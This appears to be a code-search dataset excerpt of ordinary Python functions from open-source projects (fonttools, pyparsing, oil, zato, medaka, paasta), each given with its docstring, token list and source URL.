def buildFormat3Subtable(self, rule, chaining=True): st = self.newSubtable_(chaining=chaining) st.Format = 3 if chaining: self.setBacktrackCoverage_(rule.prefix, st) self.setLookAheadCoverage_(rule.suffix, st) self.setInputCoverage_(rule.glyphs, st) else: self.setCoverage_(rule.glyphs, st) self.buildLookupList(rule, st) return st
[ "def", "buildFormat3Subtable", "(", "self", ",", "rule", ",", "chaining", "=", "True", ")", ":", "st", "=", "self", ".", "newSubtable_", "(", "chaining", "=", "chaining", ")", "st", ".", "Format", "=", "3", "if", "chaining", ":", "self", ".", "setBacktrackCoverage_", "(", "rule", ".", "prefix", ",", "st", ")", "self", ".", "setLookAheadCoverage_", "(", "rule", ".", "suffix", ",", "st", ")", "self", ".", "setInputCoverage_", "(", "rule", ".", "glyphs", ",", "st", ")", "else", ":", "self", ".", "setCoverage_", "(", "rule", ".", "glyphs", ",", "st", ")", "self", ".", "buildLookupList", "(", "rule", ",", "st", ")", "return", "st" ]
https://github.com/fonttools/fonttools/blob/892322aaff6a89bea5927379ec06bc0da3dfb7df/Lib/fontTools/otlLib/builder.py#L531-L541
rootpy/rootpy
3926935e1f2100d8ba68070c2ab44055d4800f73
rootpy/extern/pyparsing.py
python
nullDebugAction
(*args)
Do-nothing' debug action, to suppress debugging output during parsing.
Do-nothing' debug action, to suppress debugging output during parsing.
[ "Do", "-", "nothing", "debug", "action", "to", "suppress", "debugging", "output", "during", "parsing", "." ]
def nullDebugAction(*args): """'Do-nothing' debug action, to suppress debugging output during parsing.""" pass
[ "def", "nullDebugAction", "(", "*", "args", ")", ":", "pass" ]
https://github.com/rootpy/rootpy/blob/3926935e1f2100d8ba68070c2ab44055d4800f73/rootpy/extern/pyparsing.py#L744-L746
oilshell/oil
94388e7d44a9ad879b12615f6203b38596b5a2d3
core/state.py
python
_ArgFrame.GetNumArgs
(self)
return len(self.argv) - self.num_shifted
[]
def GetNumArgs(self): # type: () -> int return len(self.argv) - self.num_shifted
[ "def", "GetNumArgs", "(", "self", ")", ":", "# type: () -> int", "return", "len", "(", "self", ".", "argv", ")", "-", "self", ".", "num_shifted" ]
https://github.com/oilshell/oil/blob/94388e7d44a9ad879b12615f6203b38596b5a2d3/core/state.py#L627-L629
zatosource/zato
2a9d273f06f9d776fbfeb53e73855af6e40fa208
code/zato-server/src/zato/server/connection/connector/subprocess_/base.py
python
BaseConnectionContainer._create_outconn
(self, msg)
return Response()
A low-level method to create an outgoing connection. Must be called with self.lock held.
A low-level method to create an outgoing connection. Must be called with self.lock held.
[ "A", "low", "-", "level", "method", "to", "create", "an", "outgoing", "connection", ".", "Must", "be", "called", "with", "self", ".", "lock", "held", "." ]
def _create_outconn(self, msg): """ A low-level method to create an outgoing connection. Must be called with self.lock held. """ # Not all outgoing connections have their parent definitions def_id = msg.get('def_id') if def_id: # Just to be on the safe side, make sure that our connection exists if not msg.def_id in self.connections: return Response(_http_503, 'Could not find def_id among {}'.format(self.connections.keys()), 'text/plain') # Map outconn to its definition self.outconn_id_to_def_id[msg.id] = msg.def_id # Create the outconn now self.outconns[msg.id] = msg # Maps outconn name to its ID self.outconn_name_to_id[msg.name] = msg.id self.logger.info('Added connection `%s`, self.outconns -> `%s`', msg.name, self.outconns) # Everything OK return Response()
[ "def", "_create_outconn", "(", "self", ",", "msg", ")", ":", "# Not all outgoing connections have their parent definitions", "def_id", "=", "msg", ".", "get", "(", "'def_id'", ")", "if", "def_id", ":", "# Just to be on the safe side, make sure that our connection exists", "if", "not", "msg", ".", "def_id", "in", "self", ".", "connections", ":", "return", "Response", "(", "_http_503", ",", "'Could not find def_id among {}'", ".", "format", "(", "self", ".", "connections", ".", "keys", "(", ")", ")", ",", "'text/plain'", ")", "# Map outconn to its definition", "self", ".", "outconn_id_to_def_id", "[", "msg", ".", "id", "]", "=", "msg", ".", "def_id", "# Create the outconn now", "self", ".", "outconns", "[", "msg", ".", "id", "]", "=", "msg", "# Maps outconn name to its ID", "self", ".", "outconn_name_to_id", "[", "msg", ".", "name", "]", "=", "msg", ".", "id", "self", ".", "logger", ".", "info", "(", "'Added connection `%s`, self.outconns -> `%s`'", ",", "msg", ".", "name", ",", "self", ".", "outconns", ")", "# Everything OK", "return", "Response", "(", ")" ]
https://github.com/zatosource/zato/blob/2a9d273f06f9d776fbfeb53e73855af6e40fa208/code/zato-server/src/zato/server/connection/connector/subprocess_/base.py#L368-L392
nanoporetech/medaka
2b83074fe3b6a6ec971614bfc6804f543fe1e5f0
medaka/features.py
python
FeatureEncoderRegistrar.__new__
(cls, clsname, bases, attrs)
return newclass
Register class to `feature_encoders` dict upon instantiation.
Register class to `feature_encoders` dict upon instantiation.
[ "Register", "class", "to", "feature_encoders", "dict", "upon", "instantiation", "." ]
def __new__(cls, clsname, bases, attrs): """Register class to `feature_encoders` dict upon instantiation.""" newclass = super(FeatureEncoderRegistrar, cls).__new__( cls, clsname, bases, attrs) cls.register_feature_encoder(clsname, newclass) return newclass
[ "def", "__new__", "(", "cls", ",", "clsname", ",", "bases", ",", "attrs", ")", ":", "newclass", "=", "super", "(", "FeatureEncoderRegistrar", ",", "cls", ")", ".", "__new__", "(", "cls", ",", "clsname", ",", "bases", ",", "attrs", ")", "cls", ".", "register_feature_encoder", "(", "clsname", ",", "newclass", ")", "return", "newclass" ]
https://github.com/nanoporetech/medaka/blob/2b83074fe3b6a6ec971614bfc6804f543fe1e5f0/medaka/features.py#L297-L302
Yelp/paasta
6c08c04a577359509575c794b973ea84d72accf9
paasta_tools/utils.py
python
SystemPaastaConfig.get_cluster
(self)
Get the cluster defined in this host's cluster config file. :returns: The name of the cluster defined in the paasta configuration
Get the cluster defined in this host's cluster config file.
[ "Get", "the", "cluster", "defined", "in", "this", "host", "s", "cluster", "config", "file", "." ]
def get_cluster(self) -> str: """Get the cluster defined in this host's cluster config file. :returns: The name of the cluster defined in the paasta configuration """ try: return self.config_dict["cluster"] except KeyError: raise PaastaNotConfiguredError( "Could not find cluster in configuration directory: %s" % self.directory )
[ "def", "get_cluster", "(", "self", ")", "->", "str", ":", "try", ":", "return", "self", ".", "config_dict", "[", "\"cluster\"", "]", "except", "KeyError", ":", "raise", "PaastaNotConfiguredError", "(", "\"Could not find cluster in configuration directory: %s\"", "%", "self", ".", "directory", ")" ]
https://github.com/Yelp/paasta/blob/6c08c04a577359509575c794b973ea84d72accf9/paasta_tools/utils.py#L2088-L2098